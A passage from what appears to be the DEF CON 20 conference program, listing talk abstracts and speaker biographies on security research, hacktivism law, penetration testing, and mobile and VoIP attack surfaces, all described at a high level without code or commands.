building robots to messing with RFID, he just likes to figure out how things work (and how they break). Before Blackwing,
Eddie was a member of the Security Research Group at Fortify software where he helped develop methods to detect
vulnerabilities and attacks through static analysis and runtime analysis.
Eddie has previously spoken at DEF CON and is a core member of Digital Revelation, a two-time DEF CON CTF 1st place team.
Robots: You're Doing It Wrong 2
Katy Levinson Director of Development, Hacker Dojo
By popular demand, Defcon's angry little roboticist is back with more stories of
robot designs gone awry that make practical lessons on making better robots. Drinking will happen:
vodka-absconding scoundrels are not invited.
This talk will cover material assuming the average audience member is a relatively intelligent
coder with a high-school physics/math background and has seen linear algebra/calculus before.
The intent is to navigate people new to robotics around many lessons my teams and I
learned the "hard way," and to introduce enough vocabulary for a self-teaching
student to bridge the gap between amateur and novice professional robotics. It will not
cover why your Arduino doesn't work when you plugged your USB tx into your RS232 tx.
Katy Levinson is a jack-of-all-trades currently employed by Hacker Dojo, a
hackerspace in Mountain View California, where she herds cats and wrings them out for money. She was previously a
roboticist and the Software Team Lead at NASA Ames on the Lunar Micro Rover Project, and has also been an
infrastructure software engineer at Google. She briefly worked as a mercenary for a small VC firm and in
Hong Kong where she refereed political pissing matches. She survived 4 seasons of FIRST Robotics as a
team member, mentored an additional team, helped found five more and mentored them each through a full
competitive season. She has won many prestigious awards which you have neither heard of nor care about
and is a proud graduate of Worcester Polytechnic Institute.
Twitter: @katylevinson
Anonymous and the Online Fight for Justice
Amber Lyon Independent Investigative Journalist
Gabriella Coleman Chair in Scientific and Technological Literacy, McGill University, Department of Art History & Communication Studies
Marcia Hoffman Senior Staff Attorney, Electronic Frontier Foundation
Mercedes Haefer Student, UNLV
Jay Leiderman Attorney, Leiderman Devine LLP
Gráinne O’Neill Coordinator Anonlg Project, National Lawyers Guild
How the media mischaracterizes and portrays hackers.
IRL protest vs. online protest. Politically motivated prosecution. COINTELPRO.
The future of hacking and what law enforcement agencies plan to do about it.
Amber Lyon is a three-time Emmy Award-winning
investigative journalist, photographer, and documentary filmmaker. Formerly of CNN, Amber
now works independently to cover corporate corruption, human and environmental abuses,
revolutions, and hacktivists. While working for CNN, Amber worked to get more in-depth coverage
of Anonymous into the mainstream media and was the lead reporter on CNN's Inside
Anonymous special.
(https://www.youtube.com/watch?feature=player_embedded&v=pOmk-A4Av8Y)
Twitter: @amberlyon
http://www.amberlyonlive.com
Gabriella Coleman researches and teaches on the
politics of free software, hackers, the law, and digital activism. Her first book, “Coding
Freedom: The Aesthetics and the Ethics of Hacking” is forthcoming in November 2012 with
Princeton University Press and she is currently working on a new book on Anonymous
and digital activism.
Twitter: @BiellaColeman
http://gabriellacoleman.org
Marcia Hoffman is a senior staff attorney at
the Electronic Frontier Foundation, where she works on a broad range of digital civil
liberties issues including computer security, electronic privacy, and free expression.
She currently focuses on computer crime and EFF's Coders' Rights Project, which promotes
innovation and protects the rights of curious tinkerers and researchers in their
cutting-edge exploration of technology. Prior to joining EFF, Marcia was staff
counsel and director of the Open Government Project at the Electronic Privacy
Information Center (EPIC).
Twitter: @marciahoffman
https://www.eff.org/about/staff/marcia-hofmann
Mercedes Haefer: In July 2011, Mercedes was indicted along with
13 others (dubbed the Anonymous 14) for allegedly conspiring to commit distributed denial of
service (DDoS) attacks against PayPal's website as part of an alleged Anonymous Operation Payback. (allegedly)
Mercedes is enrolled as a sociology undergraduate at the University of Nevada, Las Vegas.
Twitter: @usagi_the_bunny
Jay Leiderman is a criminal defense lawyer at
Leiderman Devine LLP in Ventura, California. Among other cases involving hacktivism, Leiderman
is representing Christopher Doyon, alleged member of Anonymous known as Commander X.
(Doyon has fled to Canada using what he referred to as "an underground railroad and
network of safe houses"). Leiderman has said he knew Doyon was frustrated by the
condition of his release, which included being banned from accessing Twitter or IRC
chats. (currently the "Anon 14" have been granted their Twitter rights). As a
veteran trial attorney who spends most of his time in court defending the accused,
and as one of the few attorneys that has actually represented an alleged member of
Anonymous accused of a federal hacking crime, Leiderman brings a unique perspective
to the defense of purported members of Anonymous.
Twitter: @leidermandevine
http://www.leidermandevine.com/
Gráinne O'Neill is the Director of
the MyGideon project at the Charles Hamilton Houston Institute for Race and Justice at Harvard
Law School. She is also a board member of the National Lawyers Guild and in that role coordinates
the Anonlg Project. Anonlg is a national network of NLG attorneys who provide defense to targeted
hacktivists. She received her JD from Columbia Law School, where she was the Managing Editor of
the Jailhouse Lawyers Manual, and has a degree in computer science from Cornell University.
(http://anonlg.com)
Twitter: @grainne
http://www.nlg.org/leadership/grainne-oneill/
OPFOR 4Ever
Tim Maletic Senior Security Consultant, Trustwave SpiderLabs
Christopher Pogue Managing Consultant, Trustwave SpiderLabs
Training utilizing Opposing Forces, or OPFOR, is an exercise focused on
improving detection and response through the principle of "train as you
fight." We will demonstrate how we have applied OPFOR to build a
continuous feedback loop between penetration testing and incident
response. In OPFOR 4Ever, the defense trains the offense just as much
as the offense trains the defense, and the exercise has no end date.
Come see us demonstrate some attacks as seen from the point of view of
the defender as well as the attacker. You can then watch the replay as
we use OPFOR principles to evolve these attacks to a form more suitable
for real-world penetration testing, pentesting that strives to better
simulate what blackhats actually do. This of course raises the bar for
incident responders. Evolve or die.
Tim Maletic is a Senior Security Consultant within the Penetration
Testing team at Trustwave's SpiderLabs. Tim has been working in IT since
the birth of the web, and has been focused full-time on information
security since 2001. Prior to joining Trustwave, Tim held positions as
Senior UNIX Engineer, Senior Security Engineer, and Information Security
Officer.
Christopher Pogue is the Managing Consultant of the SpiderLabs Incident
Response and Digital Forensics team. Having served as a US Army Signal
Corps Warrant Officer, he worked on digital forensic investigations and
as a Cyber Security Instructor. Pogue joined the IBM Internet Security
Systems (ISS) X-Force after leaving the military. As a Penetration
Tester and Forensic Investigator with IBM, he performed over 300
penetration tests and 50 investigations. In his role with SpiderLabs,
Pogue leads the team that performs investigations all over the United
States, Central and South America, and the Caribbean Islands. He also
assists local, state, and federal law enforcement agencies with cases
involving digital media.
Weaponizing the Windows API with Metasploit’s Railgun
David "thelightcosine" Maloney Software Engineer, Metasploit – Rapid7
No part of the Metasploit Framework has been shrouded in more mystery
and confusion than the Railgun extension. Railgun is one of the most powerful
tools in the Metasploit arsenal when it comes to Post Exploitation. In this
talk we will examine what Railgun is, and how we can use it to turn Windows
completely against itself by weaponizing the Windows API libraries. We will
demystify Railgun by explaining exactly how it works under the covers and
how you can use it to create powerful post modules.
David “thelightcosine” Maloney is a Software Engineer on the Metasploit Team
at Rapid7. Before joining the team, he was a frequent contributor to the open
source side of the project. As a contributor he specialized in Post Exploitation.
Before Rapid7 he was a Penetration Tester, most recently for Time Warner
Cable. David is also one of the founders of Hackerspace Charlotte in Charlotte,
North Carolina.
Twitter: @thelightcosine
Defeating PPTP VPNs and WPA2 Enterprise with MS-CHAPv2
Moxie Marlinspike
David Hulton
Marsh Ray
MS-CHAPv2 is an authentication and key negotiation protocol
that, while old and battered, is still unfortunately deployed quite
widely. It underpins almost all PPTP VPN services, and is relied upon
by many WPA2 Enterprise wireless deployments. We will release tools
that definitively break the protocol, allowing anyone to affordably
decrypt any PPTP VPN traffic or CHAPv2-based WPA2 handshake with a 100%
success rate.
Moxie Marlinspike was the CTO and co-founder of Whisper
Systems, is a member of the Institute For Disruptive Studies, runs a
cloud-based password cracking service, is the original developer of
sslstrip and sslsniff, manages the GoogleSharing targeted anonymity
service, is the creator of the Convergence SSL authenticity system, and
is the co-creator of the TACK certificate pinning protocol. His tools
have been featured in many publications, including CNN, Forbes, The Wall
Street Journal, and The New York Times. He is also the author of the
sailing film "Hold Fast."
SCADA HMI and Microsoft Bob: Modern Authentication Flaws With a 90's Flavor
Wesley McGrew Research Associate and Lecturer
Critical Infrastructure Protection Center, National Forensics Training Center, Mississippi State University
SCADA HMI software provides a "control panel" interface to SCADA/ICS systems, allowing system
operators and engineers the capability to visually monitor and make changes to parameters in the system. Many
HMI packages provide the ability to authenticate users, to allow access to dangerous or sensitive controls and
data to specific users, while restricting other users to observation or less sensitive areas of the system.
Microsoft Bob was a failed Microsoft project from 1995: an attempt to make computers easy for end users by providing
a non-technical captive interface of "rooms" that users could move around in, use to launch programs, and store files in.
Cartoon guides helped users with every step of the way. Thanks to an overly helpful cartoon dog that would offer to
change your password for you if you forgot it, it's frequently used as an example of bad security design choices.
In this presentation, Wesley will point out the similarities and differences between Microsoft Bob and
SCADA HMI software, and demonstrate previously unpublished vulnerabilities in the HMI systems that are very
reminiscent of the problems with Microsoft Bob (which will also be demonstrated!). For penetration testers,
the techniques used to quickly identify these vulnerabilities will be discussed, as well as mitigations for
those who have to defend such systems.
Robert McGrew is currently a lecturer and
researcher at Mississippi State University's National Forensics Training Center, which provides free
digital forensics training to law enforcement and wounded veterans. He has interests in both penetration
testing and digital forensics, resulting in some interesting combinations of the two. He has written tools
useful to both fields (NBNSpoof, msramdmp, GooSweep), and tries to stay involved and interactive with the
online infosec community. He is currently expanding and exposing the rest of the security community to the
SCADA HMI research he began with the release of user authentication vulnerabilities in the iFIX HMI
product.
Twitter: @McGrewSecurity
http://mcgrewsecurity.com
Don't Stand So Close To Me: An Analysis of the NFC Attack Surface
Charlie Miller Principal Research Consultant, Accuvant Labs
Near Field Communication (NFC) has been used in mobile devices in some countries for a while and is now emerging
on devices in use in the United States. This technology allows NFC enabled devices to communicate with each other within close range,
typically a few centimeters. It is being rolled out as a way to make payments, by using the mobile device to communicate credit card
information to an NFC enabled terminal. It is a new, cool technology. But as with the introduction of any new technology, the question
must be asked what kind of impact the inclusion of this new functionality has on the attack surface of mobile devices. In this paper,
we explore this question by introducing NFC and its associated protocols. Next we describe how to fuzz the NFC protocol stack for two
devices as well as our results. Then we see for these devices what software is built on top of the NFC stack. It turns out that through
NFC, using technologies like Android Beam or NDEF content sharing, one can make some phones parse images, videos, contacts, office
documents, even open up web pages in the browser, all without user interaction. In some cases, it is even possible to completely
take over control of the phone via NFC, including stealing photos, contacts, even sending text messages and making phone calls.
So next time you present your phone to pay for your cab, be aware you might have just gotten owned.
Charlie Miller is Principal Research Consultant at Accuvant Labs. He was the first
with a public remote exploit for both the iPhone and the G1 Android phone. He is a four-time winner of the CanSecWest Pwn2Own
competition. He has authored three information security books and holds a PhD from the University of Notre Dame. He is
currently being held in a maximum security prison in Cupertino, but hopes to be released soon
for good behavior.
Twitter: @0xcharlie
How to Hack VMware vCenter Server in 60 Seconds
Alexander Minozhenko Senior Penetration Tester, ERPScan
This talk will discuss some ways to gain control over the virtual infrastructure through vCenter's services. I will describe a few non-dangerous bugs (they were 0-days when we found them), but if we can use all of them together, we will get administrative access to vCenter which means to the whole virtual network.
Alexander Minozhenko works in the leading IT security company ERPScan as a penetration tester. Alexander graduated in 2012 from St. Petersburg National Research University ITMO, faculty of computer science. He also likes to participate in CTF competitions.
Twitter: @al3xmin
DEF CON Comedy Jam V, V for Vendetta
David Mortman Chief Security Architect, enStratus
Rich Mogull Securosis, @rmogull
Chris Hoff Rational Security, @beaker
Dave Maynor Errata, @donicer
Larry Pesce pauldotcom.com, @haxorthematrix
James Arlen Liquid Matrix, @myrcurial
Robert David Graham Errata Security, @ErrataRob
You know you can't stay away! The most talked about panel at DEF CON! Nearly two hours of non-stop FAIL.
Come hear some of the loudest mouths in the industry talk about the epic security failures of the last year. So much fail,
you'll need the food cooked on stage to survive. Nothing is sacred, not even each other. This year's fail includes cloud,
mobile and apt to name just a few topics. If that's not enough, we'll also be making crepes on stage. Over the last two
years, we've raised over $1,500 for the EFF, let's see how much we can do this year....
David Mortman is the Chief Security Architect at enStratus and is a
Contributing Analyst at Securosis. Before enStratus, he ran operations and security for C3. He was formerly the Chief
Information Security Officer for Siebel Systems, Inc., and before that Mr. Mortman was Manager of IT Security at
Network Associates. Mr. Mortman has also been a regular panelist and speaker at RSA, Black Hat, DEF CON and Source
Boston as well. Mr. Mortman sits on a variety of advisory boards including Qualys. He holds a BS in Chemistry from
the University of Chicago. David writes for Securosis, Emergent Chaos and the New School blogs. David was an editor
for the 2nd Ed of the Cloud Security Alliance Guidance.
Rich Mogull is a recovering industry analyst and the
C-something-or-other of Securosis. Deep in his past he worked as a systems and network administrator,
before moving on to web development and then focusing on security. Previous Fail panel exploits include
impersonating an aspiring money mule, running a robot off the stage, some cool wireless stuff that
surprisingly worked, and mucking with cloud APIs.
He promises to keep his pants on this year. He dislikes hippies and hipsters.
Twitter: @rmogull
Chris Hoff is a senior director at Juniper Networks where he serves as
chief security architect. He was previously director of cloud &
virtualization solutions at Cisco Systems where he focused on virtualization
and cloud computing security, spending most of his time interacting with
global enterprises and service providers, governments, and the defense and
intelligence communities. Prior to Cisco, he was Unisys Corporation’s chief
security architect, served as Crossbeam Systems' chief security strategist,
was the CISO and director of enterprise security at a $25 billion financial
services company and was founder/CTO of a national security consultancy
amongst other startup endeavors.
Hoff is interviewed regularly by the media and press, is a featured guest on
numerous podcasts and has keynoted and presented at numerous high-profile
security conferences including Black Hat, DEF CON, Microsoft's Bluehat, RSA,
Source, SecTor, FIRST, SANS and Troopers.
Hoff is a founding member and technical advisor to the Cloud Security
Alliance, founder of the CloudAudit project and the HacKid conference and
blogs at http://www.rationalsurvivability.com/blog.
He serves on numerous advisory boards.
Hoff was a CISSP, CISA, CISM and NSA IAM but he spends the AMF's on coffee
now, instead. He was twice nominated as the Information Security Executive
of the Year and won the Security 7 award in Financial Services in 2005.
Hoff is a 2010, 2011 Microsoft MVP (Security) and a 2010 VMware vExpert.
Dave Maynor is a founder of Errata Security and serves as the Chief Technical
Officer. Mr. Maynor is responsible for day-to-day technical decisions of Errata Security and also employs a strong
background in reverse engineering and exploit development to produce Hacker Eye View reports. Mr. Maynor has
previously been the Senior Researcher for Secureworks and a research engineer with the ISS Xforce R&D team where
his primary responsibilities included reverse engineering high risk applications, researching new evasion
techniques for security tools, and researching new threats before they become widespread. Before ISS Maynor
spent 3 years at Georgia Institute of Technology (GaTech), with the last two years as a part of the
information security group as an application developer to help make the sheer size and magnitude of security
incidents on campus manageable. Before that Maynor contracted with a variety of different companies in a
wide spread of industries ranging from digital TV development to protection of top 25 websites to security
consulting and penetration testing to online banking and ISPs.
Larry Pesce is a penetration tester with NWN Corporation's
NProtect team. He spends his days hacking in his underwear, playing with various radios and often
burning his fingertips with a soldering iron, while not hanging out with the pauldotcom.com crew.
James Arlen, sometimes known as Myrcurial, is a security consultant
usually found in tall buildings wearing a suit, founder of the Think|Haus hackerspace, contributing analyst for
Securosis, columnist at Liquidmatrix Security Digest, Infosec geek, hacker, social activist, author, speaker,
and parent. He’s been at this security game for more than 15 years and loves blinky lights and shiny things.
Robert David Graham created BlackICE Defender (one of the first personal firewalls)
and BlackICE Guard (the first IPS). He developed various attack tools and methods, like "sidejacking", a component
of most attack toolkits, and is an expert in SCADA hacking.
Cortana: Rise of the Automated Red Team
Raphael Mudge Principal, Strategic Cyber LLC
Do you ever wish that you could clone yourself during a penetration test?
Meet Cortana, a new scripting language to automate Metasploit and extend Armitage. Cortana is a penetration tester's scripting
language inspired by scriptable IRC clients and bots. Its purpose is two-fold. You may create long running bots that simulate
virtual red team members, hacking side-by-side with you. You may also use it to extend the Armitage GUI for Metasploit. To
prevent self-aware bots from taking over the world, Cortana has blanket safety features to provide positive control when enabled.
This talk will introduce Cortana, the automation gap it fills, and its capabilities to you. You will see several demonstrations
of Cortana in action and get a flavor of what's now possible. Cortana was developed through DARPA's Cyber Fast Track program.
Raphael Mudge is the founder of Strategic Cyber LLC, a Washington, DC based
company that creates software for red teams. He created Armitage for Metasploit, the Sleep programming language, and the
IRC client jIRCii. Previously, Raphael worked as a security researcher for the US Air Force, a penetration tester, and he
even invented a grammar checker that was sold to Automattic. His work has appeared in Hakin9, USENIX ;login:, Dr. Dobb's
Journal, on the cover of the Linux Journal, and the Fox sitcom Breaking In. Raphael regularly speaks on security topics
and provides red team support to many cyber defense competitions.
Twitter: @armitagehacker
http://www.fastandeasyhacking.com/
Making Sense of Static - New Tools for Hacking GPS
Fergus Noble
Colin Beighley
GPS receivers are a part of everyday life, you probably own several already and use them
every day, in your phone or in your car. It's really pretty amazing that you can find your position anywhere on
Earth with just a small device you can fit in your pocket, but how does it actually work? In this talk we would
like to guide you through the amazing technical journey that makes this possible and to open it up to the hacker
community to explore.
Current GPS receivers found in mobile phones etc. are capable of about 5m accuracy but high-end receivers costing
thousands can get this down to centimeters just using some more sophisticated algorithms and processing. This really
opens up a lot of opportunities for UAVs and Quadcopters (and other applications we haven’t even thought of - what
would you use it for?) and we would like to see this level of performance available in an open-source system.
We have developed and would like to share with you a new set of tools which we hope will make GPS accessible to hackers
and experimenters; a library, libswiftnav, which contains a complete toolset for building a GPS receiver, and Piksi, a
stand-alone hardware platform to run it on. The prototype is already very capable - we can’t wait to see what you can
come up with.
Fergus Noble graduated in 2011 with an MSc. in Physics from the University of
Cambridge, UK. Whilst at Cambridge he spent most of his spare time working on a 100km amateur rocket attempt which led
to his frustration with available GPS systems. After graduating, he moved to California to work for Joby Energy on GPS
systems for high-altitude wind turbines before co-founding Swift Navigation with Colin Beighley and Henry Hallam to work
on a new open-source GPS receiver. He is also a co-maintainer of libopencm3, an open-source peripheral library for
ARM Cortex-M based microcontrollers and creator of Plot-o-matic, an open-source tool for quickly visualising
real-time data streams.
https://github.com/fnoble
Colin Beighley graduated from the University of California at Santa Cruz in 2010 with a BS in Electrical Engineering. He worked at Joby Energy in Bonny Doon, California, before co-founding Swift Navigation with fellow GPS hackers Fergus Noble and Henry Hallam. He is the creator of softgnss_python, an open-source GPS/GNSS post-processing library.
SQL ReInjector - Automated Exfiltrated Data Identification
Jason A. Novak Assistant Director, Digital Forensics; Stroz Friedberg, LLC
Andrea (Drea) London Digital Forensic Examiner; Stroz Friedberg, LLC
In 2011, SQL injections became front-page news as ever more high-profile companies were victims of
automated SQL injection attacks. Responders spent countless hours looking at values in log files like "0x31303235343830303536"
trying to figure out what was being exfiltrated by whom. Incident response costs skyrocketed while the cost of attacking fell.
This presentation will debut SQL ReInjector, a tool for the rapid assessment of logs from SQL injection attacks to determine
what data was exfiltrated.
When responding to an SQL injection attack, responders have to determine what was exfiltrated by manually parsing the web
server logs from the victimized host. This is a time-consuming process that requires a significant amount of a responder's
time. Moreover, manual replay of the SQL injection does not account for system level discrepancies in how queries are
executed by the system – running SQL against a SQL server directly doesn’t account for the behavior of any intermediary
systems – e.g. any application layer logic or nuances in how the web application and database server interact.
SQL ReInjector uses the log files from the machine that has been subject to a SQL injection attack to replay the attack
against the server (or a virtualized forensic image thereof) and captures the data returned by the SQL injection web site
requests, reducing the amount of time responders have to spend looking at web server logs and allowing responders to
recreate the data exfiltrated through a SQL injection attack.
Jason A. Novak is an Assistant Director of Digital Forensics in
Stroz Friedberg's Chicago office. At Stroz Friedberg, Mr. Novak has been lead examiner in a wide range of
cases involving digital forensics, incident response, application testing, source code analysis, and data analytics,
and has developed numerous tools to expedite the firm's analysis and response capabilities. The proprietary tools
developed by Mr. Novak have included: an anti-money laundering data analytics platform and tools to process
electronically stored information to respond to forensic and electronic discovery requests. As a co-writer of
the Google Street View report, Mr. Novak analyzed the source code to gstumbler, the WiFi device geolocation
application used by Google as part of the Street View project, and documented its structure and functionality
in a publicly released report; Mr. Novak has responded to inquiries about the report from domestic and foreign
regulators.
Twitter: @strozfriedberg
Andrea (Drea) London is a Digital Forensic Examiner in Stroz Friedberg's
Dallas office. At Stroz Friedberg, Ms. London acquires and examines digital evidence from laptops, desktops and
mobile phones in support of legal proceedings, criminal matters, and/or corporate investigations. Additionally she
is responsible for implementing large-scale, end-to-end electronic discovery for both civil and criminal litigation.
Ms. London previously held positions at Arsenal Security Group and IBM’s Internet Security Systems Emergency Response
Team. At Arsenal, Ms. London was an integral part of the company’s immediate response team for worldwide cyber security
incidents. During this time she completed and has maintained certification as a Payment Application Qualified Security
Assessor (PA QSA), Payment Card Industry (PCI QSA), and PCI Forensic Investigators (PFI), one of the first appointed by
the PCI Council. At IBM, she acted as an official Quality Incident Response Assessor (QIRA) reporting PCI breaches to
major card brands. Prior to her work for IBM, Ms. London was with the Air Force Office of Special Investigations (AFOSI),
where she was one of two Airmen chosen for special duty assignment at the Defense Cyber Crime Center, and where she was
tasked with testing and evaluating forensic software and hardware for the Center.
Meet the EFF
Kurt Opsahl Senior Staff Attorney, Electronic Frontier Foundation
Marcia Hofmann EFF Senior Staff Attorney
Hanni Fakhouri EFF Staff Attorney
Peter Eckersley EFF Director of Technology Projects
Eva Galperin International Freedom of Expression Coordinator
Trevor Timm Activist
Get the latest information about how the law is racing to
catch up with technological change from staffers at the Electronic Frontier Foundation,
the nation’s premiere digital civil liberties group fighting for freedom and privacy in
the computer age. This session will include updates on current EFF issues such as
surveillance online and fighting efforts to use intellectual property claims to shut
down free speech and halt innovation, discussion of our technology project to
protect privacy and speech online, updates on cases and legislation affecting
security research, and much more. Half the session will be given over to
question-and-answer, so it's your chance to ask EFF questions about the
law and technology issues that are important to you.
Kurt Opsahl is a Senior Staff Attorney
with the Electronic Frontier Foundation focusing on civil liberties, free speech
and privacy law. Opsahl has counseled numerous computer security researchers on
their rights to conduct and discuss research. Before joining EFF, Opsahl worked
at Perkins Coie, where he represented technology clients with respect to intellectual
property, privacy, defamation, and other online liability matters, including working
on Kelly v. Arribasoft, MGM v. Grokster and CoStar v. LoopNet. Prior to Perkins, Opsahl
was a research fellow to Professor Pamela Samuelson at the U.C. Berkeley School of
Information Management & Systems. Opsahl received his law degree from Boalt Hall,
and undergraduate degree from U.C. Santa Cruz. Opsahl co-authored "Electronic
Media and Privacy Law Handbook." In 2007, Opsahl was named as one of
the “Attorneys of the Year” by California Lawyer magazine for his work on
the O'Grady v. Superior Court appeal, which established the reporter’s privilege
for online journalists.
Twitter: @kurtopsahl, @eff
Facebook: eff
https://www.eff.org
Marcia Hofmann is a senior staff attorney
at the Electronic Frontier Foundation, where she focuses on computer crime and security,
electronic privacy, free expression, and other digital civil liberties issues. Prior to
joining EFF, Marcia was staff counsel and director of the Open Government Project at
the Electronic Privacy Information Center (EPIC).
Hanni Fakhouri is a Staff Attorney with the Electronic
Frontier Foundation focusing on the intersection of technology and criminal law within the Coders
Rights Project. Prior to joining EFF, Hanni worked as a federal public defender in San Diego.
In less than four years, he tried fourteen felony jury and bench trials and argued before the
Ninth Circuit Court of Appeals four times, winning three reversals, including a published
reversal in U.S. v. Sandoval-Gonzalez. He also served as a copy editor for the 2010 edition
of Defending a Federal Criminal Case. While in law school, Hanni worked at the federal public
defender's office in Sacramento, where he obtained acquittals in one jury trial and two bench
trials. Hanni is a graduate of UC Berkeley, where he received two degrees, including an honors
degree in history, and Pacific McGeorge School of Law, where he was elected to the Order of
Barristers for his excellence in written and oral advocacy. Hanni is a member of the National
Association of Criminal Defense Lawyers.
Peter Eckersley is Technology Projects Director
for the Electronic Frontier Foundation. He keeps his eyes peeled for technologies that, by
accident or design, pose a risk to computer users' freedoms—and then looks for ways to fix
them. He explains gadgets to lawyers, and lawyers to gadgets. Peter's work at EFF has
included privacy and security projects such as Panopticlick, HTTPS Everywhere, SSDI,
and the SSL Observatory; and running the first controlled tests to confirm that Comcast
was using forged reset packets to interfere with P2P protocols.
Eva Galperin is EFF's International Freedom of Expression
Coordinator, and has been instrumental in highlighting government malware designed to spy upon activists
around the world. A lifelong geek, Eva misspent her youth working as a Systems Administrator all
over Silicon Valley. Since then, she has seen the error of her ways and earned degrees in Political
Science and International Relations from SFSU. She comes to EFF from the US-China Policy Institute,
where she researched Chinese energy policy, helped to organize conferences, and attempted to make
use of her rudimentary Mandarin skills.
Trevor Timm is an activist at the
Electronic Frontier Foundation. He specializes in free speech issues and government
transparency. Before joining the EFF, Trevor helped the longtime General Counsel of
The New York Times, James Goodale, write a book on the First Amendment. He has
also worked for the former President of the ACLU and at The New Yorker. He
graduated from Northeastern University and has a J.D. from New York Law School.
The End of the PSTN As You Know It
Jason Ostrom Security Researcher, VIPER Lab (Voice over IP Exploit Research), Avaya, Inc.
Karl Feinauer Vulnerability Research Software Engineer, VIPER Lab
William Borskey Senior Security Consultant, VIPER Lab
The PSTN as you know it is changing. In March of 2012, the NSA announced "Project Fishbowl", a reference architecture for secure mobility VoIP usage on smartphones using WiFi or 3GPP networks. At the same time, mobile carriers in the US (seemingly) ensure that subscribers must purchase voice plans on their smartphones and can't opt for data only plans - which curtails a compelling option of purchasing a smartphone for data only usage, such as VoIP. Other mysterious clues abound. Since the mid-to-late 90s, users have been able to host their own web and email servers using open standards and DNS for advertisements, peering directly between domains and systems. At the same time, since the early 2000s, the technology and protocols have existed for enabling direct VoIP peering between enterprises, bypassing the PSTN, using DNS SRV records and ENUM - the same way we've been using DNS for HTTP and SMTP for years. But why is this seemingly attractive option for cost savings and collaboration not more widely adopted? Surely this is the way VoIP was meant to be used? Or isn't it?
In this talk, we will explore the so-called market buzz of "UC Federation". Rather, we will kick this term to the bit bucket, and present an overview of how the industry is deploying these solutions technically. We will take a closer look at the security of being able to use UC between organizations, advertised using DNS, the same way that companies use UC internally for VoIP, HD Video, data sharing, IM & Presence, and collaboration applications. This talk is divided into three sections.
First, we'll share our research on the state of public SIP peering using DNS SRV. Is SIP peering proliferating? How? What does it mean? Using a PoC research tool, we'll look at some initial data we've found, in order to plot the increase of peering using DNS SRV records for SIP service location advertisement.
Second, we will show the audience findings from our UC “Federation” Honeypot research project. We've built a UC solution using a large commercial vendor, and have tested "Federation" with the help of the Global Federation Directory. Just to see what would happen. We've also set up a network of cloud based UC Federation honeypots using open source software, to explore attacks against UC Federation Systems.
Last, we show it can be done and how. Did you know that you can set up your own VoIP server with DNS based routing and HA and directly peer between VoIP servers, providing services for your friends and your company from your favorite BYOD using an address just like your email address, right now? For little to no cost, using open source software? It's interesting that when companies communicate VoIP inter-domain, the most prevalent architecture is to route calls over a private network, or through a carrier connected to the PSTN. Ironically, the infrastructure has existed for years to do direct public SIP peering. We'll explore this concept of "Islands of VoIP", and bring together our security research findings in this area along with industry roadblocks. Can a more open standard protocol be adopted using existing open source software, to easily UC "Federate" between different vendors? We think this is the future. It's exciting, and we want to show it to you.
Celebrating the 20th anniversary of DEF CON, this presentation is bold. We can't promise that it will be 100% complete, as it will likely evolve well past DEF CON. But we do promise some ballyhoo demos and shenanigans. Tomfoolery will ensue.
Jason Ostrom is a security researcher working in the VIPER Lab,
with an interest in UC application (In)security. He is a graduate of the University of Michigan, Ann Arbor,
and has over 14 years of experience in the IT industry, including VoIP penetration testing. He is the author
of the VoIP Hopper security tool and has contributed to other open source UC security tools.
Karl Feinauer is a Vulnerability Research Software Engineer working in
the VIPER Lab. Karl has a strong interest in Windows and UC security, and contributed to the development of the OCS
Assessment Tool. He is a graduate of the University of Texas at Arlington.
William Borskey is a Senior Security Consultant working in the VIPER Lab.
His areas of interest include telecommunications and security. He is a graduate of Louisiana State University at Baton Rouge.
APK File Infection on an Android System
Bob Pan Mobile Security Research Engineer, TrendMicro Inc.
The concept of APK file infection on Android is similar to the concept of PE file infection on Windows systems. As the performance of Android devices has increased, it has become possible to implement such a concept on Android systems. We will demonstrate how to implement this concept. In addition, we will also give a demo to show that a PoC virus can infect normal APK files on a real Android mobile phone.
Bob Pan mainly focuses on the mobile platform security domain (including Android/iOS platforms).
He likes reverse-engineering and contributes to open source. He is the owner of dex2jar (http://code.google.com/p/dex2jar/), which is one of the most popular tools in the Android security industry.
Now he works as a Mobile Security Research Engineer at TrendMicro.
Panel: The Making of DEF CON 20
Have you ever wondered what it takes to put DEF CON together? Well, now is your chance to find out.
DEF CON is broken down into 10 departments: Security, Networking, Press, Speaker Ops, Contests, Vendors, Swag Booth,
Registration, Quarter Master, and Operations. Each of the department heads (aka the DEF CON Planning Staff) will be
part of this panel and will give an overview of what we do the other 361 days of the year to plan DEF CON. There
will also be time for Q&A from the audience so if you want to know how we do this, come prepared with questions.
Adventures in Bouncerland
Nicholas J. Percoco Senior Vice President, Trustwave SpiderLabs
Sean Schulte Software Engineer, Trustwave
Meet [REDACTED]. He is a single function app that wanted to be much more.
He always looked up those elite malware and botnet apps but now that the
Google’s Bouncer moved into town his hopes and dreams appeared to be
shattered. This was until he was handed a text file while strolling along a
shady part of the Internet (AKA Pastebin). The title of this txt file was
“Bypassing Google’s Bouncer in 7 steps for Fun and Profit”. Upon reading
this, our little app began to glow with excitement. He routed himself all
the way to the gates of Google Play and began his journey from a simple
benign app that [REDACTED], to a full-fledged info stealing botnet
warrior. In this presentation we will tell the story of how our little app
beat the Bouncer and got the girl (well, at least all her personal
information, and a few naughty pics).
Nicholas J. Percoco: With more than 15 years of
information security experience, Percoco is the
lead security advisor to many of Trustwave's premier clients and assists
them in making strategic decisions around security compliance regimes. He
leads the SpiderLabs team that has performed more than 1300 computer
incident response and forensic investigations globally, run thousands of
penetration and application security tests for clients, and conducted
security research to improve Trustwave's products. Percoco and his
research have been featured by many news organizations including: The
Washington Post, eWeek, PC World, CNET, Wired, Hakin9, Network World, Dark
Reading, Fox News, USA Today, Forbes, Computerworld, CSO Magazine, CNN,
The Times of London, NPR, Gizmodo, Fast Company, Financial Times and The
Wall Street Journal.
Twitter: @c7five
http://blog.spiderlabs.com
Sean Schulte: Sean is an engineer at Trustwave who works primarily with Java and Ruby.
He is responsible for building external APIs such as the SSL reseller API,
and internal APIs including a Google Safe Browsing blacklist along with
the infrastructure to support various SSL services. In his spare time he
maintains an unpopular, but feisty, baseball blog.
Twitter: @sirsean
Anti-Forensics and Anti-Anti-Forensics: Attacks and Mitigating Techniques for Digital-Forensic Investigations
Michael Perklin
Digital investigations may be conducted differently by various labs (law enforcement agencies,
private firms, enterprise corporations) but each lab performs similar steps when acquiring, processing, analyzing,
or reporting on data. This talk will discuss techniques that criminals can use to throw wrenches into each of these
steps in order to disrupt an investigation, and how they can even force evidence to be excluded from litigation.
